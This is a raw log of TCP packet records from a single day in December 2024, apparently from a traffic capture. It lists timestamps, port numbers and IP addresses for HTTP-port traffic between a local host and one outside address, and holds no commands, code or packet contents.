                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.969597101 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.969661951 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.969674110 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.970751047 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.970837116 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.970912933 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.972239017 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.972292900 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.972335100 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.973462105 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.973604918 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.973696947 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.974596024 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.974643946 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.974689960 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.975745916 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.975790977 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.975887060 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.976699114 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.976818085 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.976907015 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.977670908 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.977715969 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.977725983 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.978702068 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.978773117 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.978851080 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.979592085 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.979649067 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.979679108 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.980631113 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.980726004 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.980729103 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.981729031 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.981782913 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.981950045 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.982845068 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.982971907 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.983052969 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.984626055 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.984703064 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.984736919 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.985089064 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.985354900 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.985435009 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.986157894 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.986216068 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.986299038 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.987248898 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.987425089 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.987435102 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.988351107 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.988416910 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.988451958 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.989480019 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.989543915 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.989651918 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.990622997 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.990681887 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.990714073 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.991718054 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.991836071 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.991955042 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.992767096 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.992865086 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.992901087 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.993932962 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.993983030 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.994079113 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.995069981 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.995153904 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.995167971 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.996104002 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.996217966 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.996316910 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.997191906 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.997251034 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.997292995 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.998290062 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.998363972 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.998400927 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.999586105 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.999665022 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:37.999850988 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.000574112 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.000643969 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.000689030 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.001650095 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.001724005 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.001821041 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.002839088 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.002893925 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.002928019 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.003997087 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.004067898 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.004182100 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.004956007 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.005023003 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.005117893 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.006181955 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.006249905 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.006361961 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.007175922 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.007283926 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.007426977 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.008295059 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.008363962 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.008428097 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.009460926 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.009553909 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.009661913 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.010468960 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.010668993 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.010772943 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.011590958 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.011657953 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.011673927 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.012739897 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.012773037 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.012865067 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.013804913 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.013885021 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.013900995 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.015050888 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.015116930 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.015163898 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.016108990 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.016155005 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.016174078 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.017143965 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.017201900 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.017313004 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.018266916 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.018341064 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.018399000 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.019428968 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.019516945 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.019527912 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.020492077 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.020546913 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.020555973 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.021548986 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.021616936 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.021693945 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.069183111 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.156836987 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.156971931 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.157126904 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.157326937 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.157480955 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.158535004 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.158598900 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.158638954 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.158699036 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.159532070 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.159615040 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.159694910 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.160554886 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.160768032 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.161701918 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.161776066 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.161834955 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.161981106 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.163117886 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.163325071 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.163865089 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.163944006 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.163954973 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.163994074 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.165016890 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.165127039 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.165236950 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.166055918 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.166196108 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.167202950 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.167293072 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.167294979 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.167337894 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.168358088 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.168467045 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.168859005 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.169420958 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.169481993 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.169565916 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.170500994 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.170659065 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.170742989 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.171605110 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.171761990 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.171869993 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.172703981 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.172952890 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.173049927 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.173836946 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.174031973 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.174115896 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.174959898 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.175079107 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.175179958 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.176024914 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.176162004 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.176244020 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.177120924 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.177238941 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.177328110 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.178308964 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.178368092 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.178493977 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.179352045 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.179419994 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.179505110 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.180397034 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.180535078 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.180672884 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.181649923 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.181714058 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.181807041 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.182698011 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.182873011 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.182986021 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.183837891 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.183979034 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.184056997 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.184859991 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.185034037 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.185137987 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.185957909 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.186081886 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.186207056 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.187083006 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.187122107 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.187200069 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.188235998 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.188354969 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.188436985 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.189341068 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.189482927 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.189573050 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.190387011 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.190584898 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.190669060 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.191473961 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.191617012 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.191698074 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.192569017 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.192730904 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.192835093 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.193670988 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.193964005 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.194044113 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.194762945 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.194883108 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.194967985 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.195945978 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.196006060 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.196094990 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.197050095 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.197205067 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.197293043 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.198070049 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.198220968 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.198333025 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.199198961 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.199296951 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.199383020 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.200288057 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.200318098 CET8049738176.111.174.140192.168.2.4
